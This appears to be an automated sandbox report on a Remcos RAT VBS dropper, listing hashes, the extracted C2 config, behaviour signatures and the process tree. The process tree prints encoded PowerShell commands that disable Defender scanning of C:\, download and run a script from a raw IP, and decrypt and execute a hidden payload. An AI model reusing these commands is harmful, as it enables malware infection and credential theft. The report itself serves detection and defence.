Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
19-07-2024 10:17
Static task
static1
Behavioral task
behavioral1
Sample
SHP_01992336.vbs
Resource
win7-20240704-en
General
-
Target
SHP_01992336.vbs
-
Size
219KB
-
MD5
7551bcf735cd51d7e003ea42f3c9bc2f
-
SHA1
2dbef22e293013eaaf85db350a131e32db25b581
-
SHA256
e6e8a9afd766ad37eb26f95a91ce4f85183ec483242d86845e87c5bdaeec9f0d
-
SHA512
a3ea9816176bcfc83fee3de582f8d2a22a15a926fa46ddc1675ab98d7fd99028bebe9812a94dbc0ec583cf9fded21ccf99230d146e9e467006306ca8feddf9f3
-
SSDEEP
6144:3iF3KsfKvQXzfT1gSynnJLeZy+xu6FQtZ:yF3Ks6QDfT1gTnnJLeZdU6sZ
Malware Config
Extracted
remcos
zynova
2024remcmon.duckdns.org:14645
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-R2I0JW
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/1760-74-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/1980-78-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/3576-73-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/1980-78-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/1760-74-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
flow pid Process 3 364 powershell.exe 8 3044 WScript.exe 18 3044 WScript.exe 20 3044 WScript.exe 33 5108 powershell.exe 36 5108 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation WScript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 5108 set thread context of 1796 5108 powershell.exe 99 PID 1796 set thread context of 1760 1796 RegAsm.exe 102 PID 1796 set thread context of 1980 1796 RegAsm.exe 103 PID 1796 set thread context of 3576 1796 RegAsm.exe 105 -
pid Process 5108 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1092 powershell.exe 1092 powershell.exe 364 powershell.exe 364 powershell.exe 5108 powershell.exe 5108 powershell.exe 1760 RegAsm.exe 1760 RegAsm.exe 3576 RegAsm.exe 3576 RegAsm.exe 1760 RegAsm.exe 1760 RegAsm.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1796 RegAsm.exe 1796 RegAsm.exe 1796 RegAsm.exe 1796 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 3576 RegAsm.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 1064 wrote to memory of 376 1064 WScript.exe 84 PID 1064 wrote to memory of 376 1064 WScript.exe 84 PID 376 wrote to memory of 1092 376 WScript.exe 85 PID 376 wrote to memory of 1092 376 WScript.exe 85 PID 376 wrote to memory of 364 376 WScript.exe 87 PID 376 wrote to memory of 364 376 WScript.exe 87 PID 364 wrote to memory of 3044 364 powershell.exe 92 PID 364 wrote to memory of 3044 364 powershell.exe 92 PID 3044 wrote to memory of 5108 3044 WScript.exe 93 PID 3044 wrote to memory of 5108 3044 WScript.exe 93 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 5108 wrote to memory of 1796 5108 powershell.exe 99 PID 1796 wrote to memory of 1760 1796 RegAsm.exe 102 PID 1796 wrote to memory of 1760 1796 RegAsm.exe 102 PID 1796 wrote to memory of 1760 1796 RegAsm.exe 102 PID 1796 wrote to memory of 1760 1796 RegAsm.exe 102 PID 1796 wrote to memory of 1980 1796 RegAsm.exe 103 PID 1796 wrote to memory of 1980 1796 RegAsm.exe 103 PID 1796 wrote to memory of 1980 1796 RegAsm.exe 103 PID 1796 wrote to memory of 1980 1796 RegAsm.exe 103 PID 1796 wrote to memory of 2456 1796 RegAsm.exe 104 PID 1796 wrote to memory of 2456 1796 RegAsm.exe 104 PID 1796 wrote to memory of 2456 1796 RegAsm.exe 104 PID 1796 wrote to memory of 3576 1796 RegAsm.exe 105 PID 1796 wrote to memory of 3576 1796 RegAsm.exe 105 PID 1796 wrote to memory of 3576 1796 RegAsm.exe 105 PID 1796 wrote to memory of 3576 1796 RegAsm.exe 105
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHP_01992336.vbs" /elevate2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADIANAA1AC4AMQAzADUALgAxADQAMwAvADUANQAwADUANQAvAGMALwBJAEUAYwBoAGUAYwBrAGkAbgBnAGIAbwBvAGsALgB2AEIAUwAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAeQB6AGUAZgBYAEMAcgB4AFQAcAB3AHIAYgBKAGgAVABvAEYAUwAuAHYAQgBTAA==3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\yzefXCrxTpwrbJhToFS.vBS"4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI38252555980957241034615985855951CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnItyg30b2mPiin84dCXPYANAtNIMJrqHOYn2KTcOOVppbWc8q7E33whW3SgdTP4sjB+TWzniBqOGHiuCQ4Y49h1Btkm9Jra+JrtKddvNse+AMDwT/U73Lg/HLqyCgw9/H12ozMqugKnaQVKh9N7e59XtHcBlySItADKItTs6terp+uw9udYNzw6FvcAoM79HCA8tNsCODQU9s9do+WqdCibUSEsXgyOPFvQWRCIhedlAb5TwwyHT7pbiFdmOthryrCKvk1lcHH7bbNclCK3KxmKAdTg2CKQiA/EFW30DMGHKdgU1fe4xorJPChAgRzcZPBVNCW2fz/JP+l3q6P21vJUdr2gNhXJ2wI5nBvZ/BdQpVtfF66qBpvvjSNeFHaZQ4PE2lxpHpaghrC93FxtStvfYR5WcbzZ9hiMqAlPAFGctqa869qbjRfC7uWkp+ff11SG/YcWyvGioqn6QSSrISG/0sIoSvCwFOlezrAKikTRMs7fCu15CKIvob3S28rPW1EB/gTQeEC74Rwcy2n3zc8nf3LbP7NeRFWb7iarDlYdCNEfPidEaUZVTgIQdi+WKCm6ZDQn8Ske5ZBvgxC2DPMgUrl7rZ4EgVKW4lhUf2siQBITqt8e2AZ/Q7WrXt1HnsO1fjt5cgh/NoMZA4nOqFOjIrSarKOql2qV0Eab52EDqxdbxIwVvI/1kRiJfuUj6GN28FMj/eNWECOfERCY0kB+duLdS7I5cemA00VL8v6GHEPJ5UPnBJtUALs8KTn5WvCIkiZMSslD1+ijFbW8mkYZcqMeG+WqRfPP0YhexjdNamdAnoo+FlNUPdlrcBMYlh/oIOm/MvYFmDJoe+aqpozlApMWVPTZaWjaSLlAKHGv1/C5EQyyOdkHuAUYxVqg1NKCXch93jW7/kERB2WtvCSmk343Tj18sPlf7p9T1a0XuUWF6EhCgBXu1YkN6j8Ptk7Xdr6sX1cJXvNY93a0G23HNx4DluZZa9BzvqAQ8Rfc4noUvkKCc0FankjjaaiaWy368YbhRPUO8x3T8e8fUrMHZ6nG5BpG+g0UgsXaXGXHBtbOPK0jdWyRoZiEw3Kuoui3QoVygHPcbrVssEkAr3ROU9UVoJ5kMuIUQb74S8k63nj+Ho2Ga6yeMT/N4pOh22WVI+UqXn23IL3NDATKE6sprc/byS3eGZKNDDO7Q5asglt/0BHw1zMmwGCtwHQiwdU8YJrucBW7bajieLo3EsQGsxxBcqReQqjxMH5vg4lICoNC9uYYYQbcpk9op9eBLnX4TueRVHi1BlR462h22LI3keBwVUxxq05VVVpH6zsz8C5b835Y6SatJcIEU46h9g56vhwf8qUQ3sX6/m2j7FYCmRL1SdcFC9NOEs7z8BAPHicNM2d7z6ztL8NDIFjY4gXc/X4WfPwsHu9kVhnEJ4OfQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')5⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\kowmdzctlcdyhcdaewhjdzdwixqb"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1760
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mqcedrnnzkvljqzevhulgmxnieikfzc"7⤵
- Accesses Microsoft Outlook accounts
PID:1980
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xkppekxovsnquwnieromrqsersrtykacou"7⤵PID:2456
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xkppekxovsnquwnieromrqsersrtykacou"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
156B
MD5ad6c37ef980373e9bcbd14810fad34bc
SHA19c061a1b3608b7c7f1db7cd06c8246913ee11bda
SHA256ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
SHA51230dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f
-
Filesize
1KB
MD5eb4d127b8a6f84a1cee423c5e3e3a51d
SHA1c55263a8ff097067f2393ce2120801a445fd1949
SHA256d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514
SHA51245a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5982ebb238759653970e22ee9fad24470
SHA115fca6be8cc4a276c9f70a73f28c52c3b0eead15
SHA256c8b9cad5602932ea51b923f39f4b2d9aedf1f4915880d89032ab6636acaf9bea
SHA512c8777edf0dd3e72e0cf3bb89db2bc7856fed0eeca7199806fec341e9168899e3b700c73a6b2e7cb0e8ccc5523116d6ecfde5c9ebcc83288a162dd1b0ea78201b
-
Filesize
54KB
MD52718814507f5502e05d21540f0ebc5e1
SHA15e33409f382ac6f9d52c8c49e0a0b12ce4dd2140
SHA256d6ebd048f0ef80ea876bf28ac630c903b3c960bc7448ab8072f32a0e3e4334aa
SHA512ac5285820ba227dc4362150015244d5fd92be79c283ad1c30fb4683ef847491b08e7d92321278925a47de5c2215ea836958ab8a2cc6a8ed3429e9f4777bd0e8c